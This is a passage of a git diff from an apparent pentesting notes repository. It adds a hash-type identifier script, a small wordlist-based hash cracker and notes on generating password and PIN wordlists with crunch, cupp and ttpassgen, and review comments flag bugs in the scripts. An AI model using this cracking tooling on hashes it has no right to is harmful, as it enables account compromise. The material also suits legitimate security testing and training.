hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") +def MD5(hash): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") +def MD5HMAC(hash): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") +def MD5HMACWordpress(hash): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") +def NTLM(hash): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") +def RAdminv2x(hash): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") +def RipeMD128(hash): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") +def RipeMD128HMAC(hash): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") +def SNEFRU128(hash): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") +def SNEFRU128HMAC(hash): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") +def Tiger128(hash): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") +def 
Tiger128HMAC(hash): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") +def md5passsalt(hash): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") +def md5saltmd5pass(hash): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") +def md5saltpass(hash): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") +def md5saltpasssalt(hash): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") +def md5saltpassusername(hash): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") +def md5saltmd5pass(hash): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") +def md5saltmd5passsalt(hash): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") +def md5saltmd5passsalt(hash): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") +def md5saltmd5saltpass(hash): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") +def md5saltmd5md5passsalt(hash): + 
hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") +def md5username0pass(hash): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") +def md5usernameLFpass(hash): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") +def md5usernamemd5passsalt(hash): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") +def md5md5pass(hash): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") +def md5md5passsalt(hash): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") +def md5md5passmd5salt(hash): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") +def md5md5saltpass(hash): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") +def md5md5saltmd5pass(hash): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") +def md5md5usernamepasssalt(hash): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") +def md5md5md5pass(hash): + hs='ea086739755920e732d0f4d8c1b6ad8d' 
+ if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") +def md5md5md5md5pass(hash): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") +def md5md5md5md5md5pass(hash): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") +def md5sha1pass(hash): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") +def md5sha1md5pass(hash): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") +def md5sha1md5sha1pass(hash): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") +def md5strtouppermd5pass(hash): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + +def LineageIIC4(hash): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") +def MD5phpBB3(hash): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") +def MD5Unix(hash): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") +def MD5Wordpress(hash): + 
hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + +def MD5APR(hash): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + +def Haval160(hash): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") +def Haval160HMAC(hash): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") +def MySQL5(hash): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") +def MySQL160bit(hash): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") +def RipeMD160(hash): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") +def RipeMD160HMAC(hash): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") +def SHA1(hash): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") +def SHA1HMAC(hash): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + 
jerar.append("109140") +def SHA1MaNGOS(hash): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") +def SHA1MaNGOS2(hash): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") +def Tiger160(hash): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") +def Tiger160HMAC(hash): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") +def sha1passsalt(hash): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") +def sha1saltpass(hash): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") +def sha1saltmd5pass(hash): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") +def sha1saltmd5passsalt(hash): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") +def sha1saltsha1pass(hash): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") +def sha1saltsha1saltsha1pass(hash): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 
hash.isalnum()==True: + jerar.append("109360") +def sha1usernamepass(hash): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") +def sha1usernamepasssalt(hash): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") +def sha1md5pass(hash): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") +def sha1md5passsalt(hash): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") +def sha1md5sha1pass(hash): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") +def sha1sha1pass(hash): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") +def sha1sha1passsalt(hash): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") +def sha1sha1passsubstrpass03(hash): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") +def sha1sha1saltpass(hash): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") +def sha1sha1sha1pass(hash): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and 
hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") +def sha1strtolowerusernamepass(hash): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + +def Haval192(hash): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") +def Haval192HMAC(hash): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") +def Tiger192(hash): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") +def Tiger192HMAC(hash): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + +def MD5passsaltjoomla1(hash): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + +def SHA1Django(hash): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + +def Haval224(hash): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") +def Haval224HMAC(hash): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and 
hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") +def SHA224(hash): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") +def SHA224HMAC(hash): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + +def SHA256(hash): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") +def SHA256HMAC(hash): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") +def Haval256(hash): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") +def Haval256HMAC(hash): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") +def GOSTR341194(hash): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") +def RipeMD256(hash): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") +def RipeMD256HMAC(hash): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and 
hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") +def SNEFRU256(hash): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") +def SNEFRU256HMAC(hash): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") +def SHA256md5pass(hash): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") +def SHA256sha1pass(hash): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + +def MD5passsaltjoomla2(hash): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") +def SAM(hash): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + +def SHA256Django(hash): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + +def RipeMD320(hash): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + 
jerar.append("118020") +def RipeMD320HMAC(hash): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + +def SHA384(hash): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") +def SHA384HMAC(hash): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + +def SHA256s(hash): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + +def SHA384Django(hash): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + jerar.append("121020") + +def SHA512(hash): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") +def SHA512HMAC(hash): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") +def Whirlpool(hash): + 
hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") +def WhirlpoolHMAC(hash): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + +print(logo) +try: + first = str(argv[1]) +except: + first = None + +while True: + try: + jerar=[] + print("-"*50) + if first: + h = first + else: + h = input(" HASH: ") + + ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); 
md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h) + + if len(jerar)==0: + + print("\n Not Found.") + elif len(jerar)>2: + jerar.sort() + print("\nPossible Hashs:") + print("[+] "+str(algorithms[jerar[0]])) + print("[+] "+str(algorithms[jerar[1]])) + print("\nLeast Possible Hashs:") + for a in range(int(len(jerar))-2): + print("[+] "+str(algorithms[jerar[a+2]])) + else: + jerar.sort() + print("\nPossible Hashs:") + for a in range(len(jerar)): + print("[+] "+str(algorithms[jerar[a]])) + + first = None + except KeyboardInterrupt: + print("\n\n\tBye!") + exit() \ No newline at end of file diff --git a/Hashes/Scripts/hash_cracker.py b/Hashes/Scripts/hash_cracker.py new file mode 100755 index 0000000..ee89b3a --- /dev/null +++ b/Hashes/Scripts/hash_cracker.py 
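Review bot: in the hash-identifier hunk, `md5saltmd5pass` is defined twice (appending "106260" and later "106340") and `md5saltmd5passsalt` is defined twice ("106360" and "106380"); Python keeps only the last definition of each name, so the codes 106260 and 106360 can never be appended to `jerar` even though the dispatch line calls both names twice. Rename or merge the duplicates so each signature has its own function. Also confirm that the code `"1094202"` appended by `sha1md5pass` is really a key of `algorithms` (every other code is six digits); if it is a typo for 109420, the `algorithms[jerar[a]]` lookup at the bottom raises `KeyError`. The bare `except:` around `str(argv[1])` should be `except IndexError:` so unrelated errors are not swallowed, and "Possible Hashs" should read "Possible Hashes".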
@@ -0,0 +1,20 @@ +#!/usr/bin/env python + +import hashlib +import pyfiglet + +print(pyfiglet.figlet_format("md5 cracker")) + +wordlist_location = str(input("Wordlist file location: ")) +hash_input = str(input("Enter hash to be cracked: ")) + +with open(wordlist_location, 'rb') as _f: + for line in _f.readlines(): + line = line.strip() + hash_ob = hashlib.sha256(line) + #hash_ob = hashlib.md5(line) + hashed_pass = hash_ob.hexdigest() + print(line) + if hashed_pass == hash_input: + print("Password found: " + line.decode()) + exit(0) diff --git a/Hashes/Wordlists.md b/Hashes/Wordlists.md new file mode 100644 index 0000000..40899ab --- /dev/null +++ b/Hashes/Wordlists.md @@ -0,0 +1,48 @@ +# Generate Wordlists + +* [username_generator](https://github.com/therodri2/username_generator.git) +* [CeWL](../enumeration/CeWL/README.md) +* [Mentalist](https://github.com/sc0tfree/mentalist.git) +* [lyricpass](https://github.com/initstring/lyricpass.git) +* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git) + + +## Cupp + +* [cupp](https://github.com/Mebus/cupp.git) + * Interactive dialogue via `cupp.py -i` + * Wordlistdownload via `cupp.py -l` + * Connections to alecto DB via `-a` + +## crunch + +```sh +crunch -o +``` + +* Option `-t` specifies variable characters + * `@`, lower case alpha characters + * `,`, upper case alpha characters + * `%`, numeric characters + * `^`, special characters including space +```sh +crunch 8 8 -t passw%%rd +``` + +## ttpassgen +* [ttpassgen](https://github.com/tp7309/TTPassGen.git) +* Generate lists from the ground up +* `pip install ttpassgen` +```sh +ttpassgen --rule '[?d]{6:6:*}' 6digitpins.txt +``` +```sh +ttpassgen --rule '[?l]{1:5:*}' all_letter_combinations.txt +``` +```sh +ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt +``` + +# exrex + +* Generate all possible outcomes from regex string diff --git a/Persistence/bashrc.md b/Persistence/bashrc.md new file mode 100644 index 0000000..bcd46a5 --- /dev/null 
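Review bot: in the hash_cracker.py hunk, `hash_input` is compared to `hashed_pass` without normalisation, so a pasted digest with a trailing space or uppercase hex never matches; use `hash_input.strip().lower()`. The banner says "md5 cracker" but the active digest is `hashlib.sha256` with the md5 line commented out; make the algorithm an explicit, documented option rather than a comment toggle. `_f.readlines()` loads the entire wordlist into memory and the `print(line)` on every candidate dominates runtime; iterate `for line in _f:` and drop the per-line print.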
